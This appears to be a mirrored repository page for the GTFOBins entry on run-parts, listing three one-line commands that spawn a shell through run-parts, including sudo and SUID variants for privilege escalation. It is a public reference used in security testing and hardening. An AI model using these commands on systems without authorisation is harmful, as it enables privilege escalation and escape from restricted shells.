1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-22 23:36:03 +02:00
GTFOBins.github.io/_gtfobins/run-parts.md
2018-11-12 15:45:29 +01:00

230 B

functions
shell sudo suid
code
run-parts --new-session --regex '^sh$' /bin
code
sudo run-parts --new-session --regex '^sh$' /bin
code
./run-parts --new-session --regex '^sh$' /bin --arg='-p'